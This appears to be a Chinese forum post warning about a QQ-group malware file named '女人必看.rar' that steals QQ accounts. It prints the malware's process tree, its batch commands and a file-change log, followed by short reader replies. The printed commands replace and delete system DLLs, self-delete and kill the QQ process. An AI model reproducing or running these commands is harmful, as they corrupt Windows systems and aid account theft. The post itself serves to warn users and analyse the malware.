最近网友在很多QQ群中发现有人共享了一个文件名为“女人必看.rar”的压缩文件，导致大量QQ号被盗。请大家高度重视qq群共享中的文件，不要轻易下载。

女人必看病毒的传播原理：

1. 通过盗取到的qq号，自动上传文件‘女人必看.rar’到qq群共享中。或通过文件中转站进行发布。

2. 当有其他用户下载到'女人必看.rar'后，运行起来.qq号就会被盗

3. 病毒作者利用盗得的号，把病毒传播到更多的qq群。这样，这个病毒就会呈爆炸式增长。

4. 攻击者可能利用了刷QQ群共享下载次数的工具，在人为上传病毒到QQ群共享空间后，再用黑客工具刷新该文件的下载次数，成为热门下载以长期置顶，增加网友下载中毒的可能性。

如果已经中招，如何处理？

1.安装金山网盾，点一键修复---全面修复。可以完美清除该病毒。并修复被破坏的系统环境。

2.立即修改qq密码。


父级进程：

   路径： C:\WINDOWS\sdsf55whg.scr 病毒母体

   PID: 1496

子级进程：

   路径： C:\WINDOWS\explorer.exe

   信息： Windows Explorer (Microsoft Corporation)

   命令行："C:\WINDOWS\explorer.exe" C:\hellboy.bat 病毒释放出hellboy.bat

move c:\dd.bat c:\dd.bat   

move c:\dd.bat c:\dd.bat

move c:\dd.bat c:\dd.bat

del C:\WINDOWS\system32\dllcache\comres.dll

move C:\WINDOWS\system32\comres.dll C:\WINDOWS\hexil.dll

move C:\WINDOWS\rxing.bat C:\WINDOWS\system32\comres.dll

copy C:\WINDOWS\hexil.dll c:\dd.bat

copy C:\WINDOWS\hexil.dll c:\dd.bat

copy C:\WINDOWS\hexil.dll c:\dd.bat

del %0

IEXPLORE.EXE http://www.baidu.com/

cmd.exe /c "C:\WINDOWS\mssoft.bat "

taskkill.exe /f /im qq.exe /t

这一句 压根就不检测 QQ进程是否存在 就关闭 显然这作者

的编程水平还不怎样 在病毒方面 跟我差远了 各种方式 手断不。。。。

sdsf55whg.scr 明显属于跟图片捆绑的

[创建] C:\WINDOWS\dfgdfgg.jpg

[创建] C:\WINDOWS\sdsf55whg.scr

[修改] C:\WINDOWS\JoachimPeiper.dat

[创建] C:\WINDOWS\rxing.bat SSM

[创建] C:\hellboy.bmp

[修改] C:\WINDOWS\system32\CatRoot2\tmp.edb

[修改] C:\WINDOWS\system32\inetcpl.cpl

[修改] C:\WINDOWS\system32\inetcpl.cpl

修改] C:\WINDOWS\system32\shell32.dll

[修改] C:\WINDOWS\regedit.exe

[修改] C:\WINDOWS\NOTEPAD.EXE

[修改] C:\WINDOWS\system32\mstask.dll

[修改] C:\WINDOWS\system32\mstask.dll

[修改] D:\K8screen\1.tmp

[修改] C:\WINDOWS\NOTEPAD.EXE

[修改] C:\WINDOWS\MxUninst.exe

[修改] C:\WINDOWS\hh.exe

[修改] C:\WINDOWS\hh.exe

[修改] D:\K8screen\1.tmp

[修改] C:\WINDOWS\explorer.exe

[修改] D:\K8screen\1.tmp

[修改] C:\WINDOWS\explorer.exe

[修改] C:\WINDOWS\system32\pifmgr.dll

[修改] D:\K8screen\1.tmp

[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG

[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG

[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG

[修改] D:\K8screen\1.tmp

[修改] C:\Documents and Settings\Administrator\ntuser.dat.LOG

[修改] C:\WINDOWS\system32\config\software.LOG

[修改] C:\WINDOWS\system32\config\so

爱不了  

不错，看看。  

偶啥时才能熬出头啊.  

晕  不信啊  

初来乍到，请多多关照。。。  

我想要`~  

看看..  

真好。。。。。。。。。  

这个贴不错！！！！！